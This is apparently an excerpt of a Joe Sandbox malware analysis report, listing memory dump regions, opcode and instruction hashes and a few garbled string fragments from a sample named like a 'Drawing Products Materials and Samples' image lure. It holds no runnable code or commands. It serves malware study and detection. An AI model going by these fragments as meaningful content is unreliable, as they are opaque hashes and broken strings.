                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 577db0b3fcb71626ee4cf168c663bfe88a50817e3523a4a29211339734255d7d
                                                                                      • Instruction ID: 10b6f899f53b09df77ccc8e7c46218a9e26a84a3ea56f51bd40be4b57ff4d81d
                                                                                      • Opcode Fuzzy Hash: 577db0b3fcb71626ee4cf168c663bfe88a50817e3523a4a29211339734255d7d
                                                                                      • Instruction Fuzzy Hash: 72719775E016188FEB68CF6AC954B99FBF2BF89301F14C1EAD448A7254DB344A85CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 92ef56bf40ebdae44c98d4b425a876772c966fce9dbdf8fd9a906cf9908b6453
                                                                                      • Instruction ID: 19144d342016eb053dc5ba3d5ac3f5e0833faf4c0971801e35f454e0a964faef
                                                                                      • Opcode Fuzzy Hash: 92ef56bf40ebdae44c98d4b425a876772c966fce9dbdf8fd9a906cf9908b6453
                                                                                      • Instruction Fuzzy Hash: EE71A6B5E016188FEB28CF6AC944B99BBF2BF89300F14C1AAD448A7254DB744A85CF11
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c61433c33a87142509652bcdbdfc9265cb3df2ae287fdcf1ee6bc28aead6bb2e
                                                                                      • Instruction ID: eaa4f1a5e816ff6128403ced7c50ec6c2d5a0971c0b562864170f7d6aa30833b
                                                                                      • Opcode Fuzzy Hash: c61433c33a87142509652bcdbdfc9265cb3df2ae287fdcf1ee6bc28aead6bb2e
                                                                                      • Instruction Fuzzy Hash: 50719575D05228CFEB64CF6AD9446DDBBF2BF89301F1090AAD408A7354DB349A86DF40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b7fdf58fb3d2ea97fb946a35c406af1bc4d8dc5047c056d0094c031c670f3a73
                                                                                      • Instruction ID: 6a4247f8b98d88869bec2d9e28636ca774573aba6180aff177093192ff1439b4
                                                                                      • Opcode Fuzzy Hash: b7fdf58fb3d2ea97fb946a35c406af1bc4d8dc5047c056d0094c031c670f3a73
                                                                                      • Instruction Fuzzy Hash: 837184B5E016288FEB68CF6AC954B99BBF2BF89300F14C1A9D408A7254DB744A85CF51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3d2c014fa4977e96296d2dd8ecb621a42f96068d05bf9e74ea8bcbe83e5bad87
                                                                                      • Instruction ID: 193fb908a720548e2cbd9613f95838c0c9c19063d5c1b80cb68dd11cc61756b6
                                                                                      • Opcode Fuzzy Hash: 3d2c014fa4977e96296d2dd8ecb621a42f96068d05bf9e74ea8bcbe83e5bad87
                                                                                      • Instruction Fuzzy Hash: A151B274E00208DFEB58DFAAD984A9DBBF2BF89300F248129E815BB365DB305941CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 41cf24900d550f21e1acbe06478be52de408cf404bf83c9295fe1fc5a5786fa8
                                                                                      • Instruction ID: 3666439265462064dc8a3fdabb052431763a75500ded3f6a409cc2ef19cc1433
                                                                                      • Opcode Fuzzy Hash: 41cf24900d550f21e1acbe06478be52de408cf404bf83c9295fe1fc5a5786fa8
                                                                                      • Instruction Fuzzy Hash: F451B474E04208DFEB58DFAAD844A9DBBF2BF89300F249129E815AB365DB305942DF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 751c19b3f933932f403ce8ba6ebae3a3b3c6b64a8046885c3396667930bc01ec
                                                                                      • Instruction ID: 3a8eeb3e85ec5ed266d1c77735d6f7eb18f3a0c0fd3eab559f231060edcd2dda
                                                                                      • Opcode Fuzzy Hash: 751c19b3f933932f403ce8ba6ebae3a3b3c6b64a8046885c3396667930bc01ec
                                                                                      • Instruction Fuzzy Hash: 25519274E01208DFDB58DFAAD9949DDBBF2BF89300F209169E409AB365DB31A901CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150954301.00000000373D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_373d0000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fb59d6976512254a61dfb3371bec2aeec0874882382422311bfa6eed27d17982
                                                                                      • Instruction ID: 208c6977b010b0c977a89a973dacbc3ac47fcaaa2fb2c9fdac4439794fee9a9b
                                                                                      • Opcode Fuzzy Hash: fb59d6976512254a61dfb3371bec2aeec0874882382422311bfa6eed27d17982
                                                                                      • Instruction Fuzzy Hash: 4C51F4B1D00608CBEB18DFAAC8447DEBBF2AF89304F20C16AD418BB295DB355946CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 195dfe3b268480a8b334a8f526f76b42b9688434a15cdc6f6b21e895a8516634
                                                                                      • Instruction ID: 25eebf6e8ddfe2b79e4b624912ee1a1ccecb66b1a0ef4307585b446209b3f042
                                                                                      • Opcode Fuzzy Hash: 195dfe3b268480a8b334a8f526f76b42b9688434a15cdc6f6b21e895a8516634
                                                                                      • Instruction Fuzzy Hash: CE41F7B0D012088BEB18DFAAC8947DDBBF2BF89314F60C06AC418BB294DB755946CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4396243cd14fe5a3e81fa8ae363d2048d1ef2b38d2673b463aca510bb0dd7871
                                                                                      • Instruction ID: be3791d850f77dc8101e5860a3624a72a5eee28f6f09295ce738e14f79a6f807
                                                                                      • Opcode Fuzzy Hash: 4396243cd14fe5a3e81fa8ae363d2048d1ef2b38d2673b463aca510bb0dd7871
                                                                                      • Instruction Fuzzy Hash: 74518AB1E016189BEB68CF5BD8447DEFAF3AFC9200F14C5AAC40CAA254DB3449868F51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: daf577b202723470b64bcb03b176d56b4300a6923d13f7dbced8f9d2841f992e
                                                                                      • Instruction ID: bc868d3b81618e1abf61fb02681c8d2377ea9a4db37ef949346a1573bbc3ed7a
                                                                                      • Opcode Fuzzy Hash: daf577b202723470b64bcb03b176d56b4300a6923d13f7dbced8f9d2841f992e
                                                                                      • Instruction Fuzzy Hash: F4416AB1E016188BEB58CF5BD95479EFAF3AFC9300F14C5BAC40CA6254DB740A868F51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6d9648a05db437b2f8850c94079e96d0faa99e6f298a4ce5db21ed007f493ac4
                                                                                      • Instruction ID: aee3804a035e507232466ecbb42e2910f966417a4362ad3f7951ed6ddb08e5f1
                                                                                      • Opcode Fuzzy Hash: 6d9648a05db437b2f8850c94079e96d0faa99e6f298a4ce5db21ed007f493ac4
                                                                                      • Instruction Fuzzy Hash: E0417BB1E016189BEB58CF5BD94479EFAF3AFC9310F14C1BAC40CA6254DB340A868F51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 22ee206bd96ffda5cbc6f3c06cc1b11a3ab8b51a0851b6338e98a15282ff1df3
                                                                                      • Instruction ID: 95f15b71b1641415d7f2cf35940269e3538b8c010c3dd492b40cd23c14d2c4b0
                                                                                      • Opcode Fuzzy Hash: 22ee206bd96ffda5cbc6f3c06cc1b11a3ab8b51a0851b6338e98a15282ff1df3
                                                                                      • Instruction Fuzzy Hash: 8E419C71E016588BEB58CF5BC85479AFAF3AFC9300F14C1BAC44CA6254DB740A858F51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d3b428ada45d7cc0869fee1d58cf070edcab9cf6e17e35888bf6378da228131c
                                                                                      • Instruction ID: 9123bf8289731dea6df0d20ed7f08569b4f1ac60116560d3cc3c1ff782564992
                                                                                      • Opcode Fuzzy Hash: d3b428ada45d7cc0869fee1d58cf070edcab9cf6e17e35888bf6378da228131c
                                                                                      • Instruction Fuzzy Hash: 9A416B71E016188BEB58CF57D9447DEFAF3AFC9304F14C1A9C50CA6254EB740A858F51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150954301.00000000373D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_373d0000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c90405206fde2cdbc8c45d43f14329f9782e3ee7091ebb82741229e2673a7056
                                                                                      • Instruction ID: 3803b68e1303de8db5637b59d60f5e54c545f831bfcb7cfc71e15dc4aa516618
                                                                                      • Opcode Fuzzy Hash: c90405206fde2cdbc8c45d43f14329f9782e3ee7091ebb82741229e2673a7056
                                                                                      • Instruction Fuzzy Hash: D941E6B5E01608CBEB18DFAAD9406DEFBF2AF89300F20D12AC418BB254DB355946CF55
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151145187.0000000037400000.00000040.00000800.00020000.00000000.sdmp, Offset: 37400000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151145187.0000000037400000.00000040.00000800.00020000.00000000.sdmp, Offset: 37400000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151145187.0000000037400000.00000040.00000800.00020000.00000000.sdmp, Offset: 37400000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !]4$,!]4$8!]4$H ]4$P!]4$T ]4$\!]4$` ]4$h!]4$l ]4$t!]4$x ]4$ ]4
                                                                                      • API String ID: 0-2294103709
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ,-]4$,-]4
                                                                                      • API String ID: 0-4257694735
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: }]4$}]4
                                                                                      • API String ID: 0-1177746836
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID: 0-3916222277
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: p]4U
                                                                                      • API String ID: 0-2385810671
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: }]4
                                                                                      • API String ID: 0-1507274201
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 48707f55277ded1a9912096b718357d41a4a2b344ded871cbedc230b704b7259
                                                                                      • Instruction ID: e6f9a88b8d7c4c87c9349872519827ee4b7a76c9152ddd105f27aa791e51d190
                                                                                      • Opcode Fuzzy Hash: 48707f55277ded1a9912096b718357d41a4a2b344ded871cbedc230b704b7259
                                                                                      • Instruction Fuzzy Hash: 55D14C35A04209CFCB28DF69D984AEEBBF1BF48314F1585A9E4159B3A1DB30ED81CB50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 37d0535d43309d26dbb857beb660ddbf8e3ecf15e07674642e15ef8e906ce180
                                                                                      • Instruction ID: e95910a6fc4cf6bd82e43673c84018b267287c1ae217136e2810dec9d91de344
                                                                                      • Opcode Fuzzy Hash: 37d0535d43309d26dbb857beb660ddbf8e3ecf15e07674642e15ef8e906ce180
                                                                                      • Instruction Fuzzy Hash: BCD1D771E042148FCB18CFA8D5849EDBBF6FF88714B1A80A9E515AB3A1C734EC81CB54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f5831030ff6055358b832474963a259e05aa0a12c9985a541b75c458304e8072
                                                                                      • Instruction ID: d486e74b31627e10f8d6f09341f26b62c97f83e1daa2e1b36c11bf2f42190b14
                                                                                      • Opcode Fuzzy Hash: f5831030ff6055358b832474963a259e05aa0a12c9985a541b75c458304e8072
                                                                                      • Instruction Fuzzy Hash: 31A13B34714600CFD759DB39C894A6977E2FF89B14B2581A8E50ACB3B6DB71EC81CB50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 39bd7d6f8250390a2dc2ff7ff2a8b7687715ff0eed6242b3e206857ee7f3bcac
                                                                                      • Instruction ID: 59b44d926e96f543853ac7413b4629b23c2cbc52c7514483703065156630c4f7
                                                                                      • Opcode Fuzzy Hash: 39bd7d6f8250390a2dc2ff7ff2a8b7687715ff0eed6242b3e206857ee7f3bcac
                                                                                      • Instruction Fuzzy Hash: C2C1F174E002298FEB64DF68C994BDDBBB2BB88300F1081EAD50CA7294DB355E85DF51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9bdefa6e1217e840d0ea1fa4ed1fd5384e7791f323c8fd4340fe3dfa2eab429a
                                                                                      • Instruction ID: 113a413ffce8903a8ecdacc6dd8123a0e7dfa6a5722c0b48d869607f1c0cee5c
                                                                                      • Opcode Fuzzy Hash: 9bdefa6e1217e840d0ea1fa4ed1fd5384e7791f323c8fd4340fe3dfa2eab429a
                                                                                      • Instruction Fuzzy Hash: B5B1F074E002298FEB64DF68C894BDDBBB2BB88300F1081EAD50CA7294DB755E85DF51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 116e1c90e1f345ca9c2aa12994fb76f0a5228bf4c4dee7f7461ef8a7e6602289
                                                                                      • Instruction ID: 689bd0cde9d41f57df86006ffefe0650f3433b1cb8dcec0801e636fd1bc468e8
                                                                                      • Opcode Fuzzy Hash: 116e1c90e1f345ca9c2aa12994fb76f0a5228bf4c4dee7f7461ef8a7e6602289
                                                                                      • Instruction Fuzzy Hash: AD51F475A0430D9FD7148A69D840AAABBF5FBC6324F74853AE918DB700D7309801CBA0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d1222f109210913ed2afc6997d29ef639228ae0d536019983cfbcda5501cf8c2
                                                                                      • Instruction ID: 790f86e732aa73894ce33beb6ec4909534352939256091b14b9f980b1d35276e
                                                                                      • Opcode Fuzzy Hash: d1222f109210913ed2afc6997d29ef639228ae0d536019983cfbcda5501cf8c2
                                                                                      • Instruction Fuzzy Hash: 25713B34A00205CFDB1CCF69D894AEDB7B2BF89315B25807AD416AB365DB32EC81CB51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 55dd438937dcf57ae6f8d5804fcf43034d80e4d75a00bd4b907bad21417cef70
                                                                                      • Instruction ID: ad0b39a099ee70c9348a51251d40e56f7f9e638a013d12eafef65c6ca718714f
                                                                                      • Opcode Fuzzy Hash: 55dd438937dcf57ae6f8d5804fcf43034d80e4d75a00bd4b907bad21417cef70
                                                                                      • Instruction Fuzzy Hash: 66711B347006058FDB59DF28C894AAE7BE6EF59340B1980A9E805CB3B1EF75DC81CB91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 23dda4f1fd9234830420151c96e92cbf035a76bec776124ad72110d9539325f9
                                                                                      • Instruction ID: 1f9e40b323e26e223675f8b2ea2b306231b72968ced2df6e1897638fc1e23f12
